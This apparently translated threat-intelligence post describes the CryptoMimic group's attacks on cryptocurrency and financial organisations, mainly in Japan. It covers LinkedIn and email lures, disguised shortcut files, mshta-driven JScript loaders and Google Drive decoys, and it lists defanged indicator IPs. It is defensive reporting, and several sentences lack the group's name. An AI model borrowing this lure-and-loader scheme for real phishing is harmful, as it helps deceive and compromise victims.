financial malware

The CryptoMimic Group targets global financial

Introduction

Recently, researchers disclosed that a threat organization called targeted global financial institutions including Japan (especially cryptocurrency-related organizations). After analysis, they found the similarity between CryptoMimic and Lazarus.

uses Cabbage RAT in the early stages of the attack to investigate the attack target and execute msoRAT. As shown in the figure below, Cabbage RAT has a multi-level read and execute structure, Cabbage RAT-A reads and executes Cabbage RAT-B, and Cabbage RAT-B reads and executes Cabbage RAT-C. The specific attack process is as follows.

clip_image001

's attack flow chart

Cabbage RAT was discovered in March 2018. It is written in VBScript language. However, starting in June 2020, the JScript version of Cabbage was observed instead of the VBScript version.

Most of CryptoMimic’s attacks start with sending malicious URLs via email or LinkedIn. When the user visits the URL, the ZIP file will be downloaded. The ZIP file contains a password-protected document file and a Windows shortcut file. The file name of the Windows shortcut file is “password.txt.lnk”, which reminds the user to open the shortcut file to obtain the password of the document file.

clip_image002

zip file content

Since the attack method using “password.txt.lnk” is well known, the organization now uses shortcut files with file names and icons, such as document files and Internet shortcuts.

clip_image003

Examples of shortcut files used in recent attacks

These shortcut files contain the mshta.exe used previously to download and execute the file commands. The difference from the previous version is that the data downloaded by mshta.exe has been changed from VBScript code to JScript code. When the JScript code is executed, explorer.exe will access the decoy text of Google Drive and create a decoy file on the infected device. In the recent attack, the decoy text contained content related to cryptocurrency, indicating that may still be targeting organizations related to cryptocurrency.

clip_image004

Examples of decoy files

In Conclusion

The organization is active, and researchers continue to observe attacks against Japanese organizations, and malware is improving.

IOCs

103[.]31.249.62
45[.]61.139.215
84[.]201.189.216
103[.]130.195.170